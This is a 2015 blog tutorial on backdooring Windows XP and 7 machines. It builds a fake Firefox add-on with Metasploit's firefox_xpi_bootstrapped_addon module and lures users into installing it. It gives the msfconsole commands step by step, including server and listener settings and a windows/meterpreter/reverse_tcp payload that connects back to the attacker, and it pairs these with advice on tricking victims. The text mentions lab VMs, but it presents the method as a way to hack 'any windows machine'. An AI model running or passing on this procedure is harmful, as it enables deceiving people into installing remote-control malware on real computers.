Friday, 17 July 2015

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials

Hello  In this tutorial i am going to explain how to hack any windows machine(xp,7) with the help of Metasploit.

Unlike last tutorial, we are not going to exploit any kind of vulnerabilities. We are going to use Social Engineering technique instead.

    Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
    Trick users into installing the add-on
    Break into the Target Machine.


   As usual, you have to set up two virutal machines(VM ) in your virtualbox namely “Target” and “Attacker”.
    Install the windows xp or 7 in the Target VM.
    Install the Backtrack in the Attacker VM.

STEP 1: Update the Metasploit

As we are going to use the latest module, you are advised to update the Metasploit modules.  Don’t know how to do this? No need to worry!

    Open the Terminal
    type msfupdate
    This will update the Metasploit with latest modules :)

STEP2: Configuring settings in Metasploit for the fake-addon exploit

1) Open the Terminal and type “msfconsole” to get the Metasploit console.

2) Type “use exploit/multi/browser/firefox_xpi_bootstrapped_addon” in the console.

3) Now we have to know the list of settings available for this exploit module.  In order to get the list , you can type “show options” in the console.
Unlike the last tutorial, this module has an extra settings for the module namely “addonname”.

 4) Configurations

Let us configure the setting for the exploit.
type the highlighted commands one by one in the console

Command: set addonname fake

Details: Name for the fake add-on.  you can change the “fake” to any name.

Command:set SRVHOST

Details: Here the is the ip of Backtrack .  You can get this ip by simply typing the “ifconfig” in the terminal. If you have trouble in getting the ip details, please drop your comment or read my previous post.

Command: set SRVPORT 80

Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx

Details: The path in which the fake add-on will be available to download. For ex:

Command: set LHOST

Details: Here the is the ip of Backtrack .  You can get this ip by simply typing the “ifconfig” in the terminal.

5) Payload

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

STEP 3: Social Engineering Attack

let us launch the exploit.
Type “exploit” in the console.
Now the exploit is started.  Our fake add-on is available at, “”.

Once victim visit the link, it will ask user to install the add-on in order to view the page.  Once user install the add-on, the system will be backdoor-ed.

Now , You can control the victim system from meterpreter.

victims pc details

Please share it if you like it

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